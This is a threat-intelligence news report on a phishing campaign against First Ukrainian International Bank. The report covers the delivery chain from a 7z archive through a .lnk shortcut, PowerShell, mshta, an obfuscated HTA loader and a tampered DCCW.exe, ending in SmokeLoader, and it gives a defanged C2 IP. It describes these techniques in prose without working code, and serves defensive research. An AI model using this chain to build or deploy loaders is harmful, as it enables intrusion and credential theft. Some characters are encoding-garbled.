In a recent campaign targeting First Ukrainian International Bank (pumb[.]ua), G DATA security researchers uncovered a deeply layered and technically advanced malware chain. At the center of this operation is SmokeLoader, a well-known and powerful modular loader thatβs been enhanced with stealthy execution tactics and a lesser-known but increasingly popular intermediaryβEmmenhtal Loader (aka EmmenHTAl or Peaklight).
This analysis exposes a refined infection strategyβone that combines social engineering, Living off the Land Binaries and Scripts (LOLBAS), and anti-analysis tactics to quietly deploy multiple malware stages without raising alarms.
The attack begins with a phishing email masquerading as a payment confirmation, containing an attachment named ΠΠ»Π°ΡiΠΆΠ½Π°_iΠ½ΡΡΡΡΠΊΡΠΈΡ.7z (translated: βPayment_instructionβ). Inside the archive:
A bait PDF mimicking financial documentsA PDF shortcut (.lnk) designed to download additional payloads from a remote serverThe report highlights the attackersβ continued use of archive-based evasion techniques, noting that βIn previous SmokeLoader campaigns, the threat actors exploited a 7-Zip zero-day vulnerability to bypass security checks using double-archived files, allowing malware execution.β Although this campaign does not use the same exploit, it demonstrates the attackersβ persistence in using archive-based evasion.
The .lnk file activates a PowerShell script that leverages Mshta, a legitimate Windows binary for executing HTML Applications. It downloads a malicious .hta file, blending into native system behavior to remain undetected.
βThis is a common LOLBAS techniqueβ¦ allowing fileless execution and minimal visibility,β the researchers note.
To further conceal the operation, the attackers use a modified DCCW.exe (Windows Display Color Calibration Wizard) as a loader, embedding JavaScript within the binary to execute malicious payloads with minimal footprint.
Emmenhtal, the loader stage, is cloaked in a crafted HTA file with a minimized window state and no taskbar presence. JavaScript embedded within the loader uses eval(erc) to execute additional obfuscated code.
βThe executed variable contains another charCode-encoded scriptβ¦ which will be executed via wscript shell.β
The script decodes and launches a PowerShell downloader, which checks for two filesβinvoice1202.pdf and putty1202.exeβand either executes them or retrieves fresh copies if missing.
The final stage drops SmokeLoader, a versatile malware platform known for:
Delivering secondary payloadsStealing browser and system credentialsInjecting into legitimate processesExecuting commands from remote C2 serversEmploying anti-debugging and anti-analysis defensesβThis file is a SmokeLoader malwareβ¦ using .NET Reactor for obfuscation and packing,β G DATA confirms.
The use of .NET Reactorβmore common in modern stealersβreflects a shift in malware tooling preferences, as attackers seek stronger evasion through commercial protectors.
G DATA also noted overlap in infrastructure and TTPs with other malware families, including Blustealer and Lumma, suggesting potential collaboration or shared platforms among cybercriminal operators.
A Wireshark packet capture confirms outbound connection attempts to 88[.]151[.]192[.]165, further indicating command-and-control activity tied to SmokeLoaderβs deployment.
βThe availability of these feature-rich new loaders that are offered through Malware-as-a-Service (MaaS) enables threat actors to be more creative in customizing their attack chain,β the researchers conclude.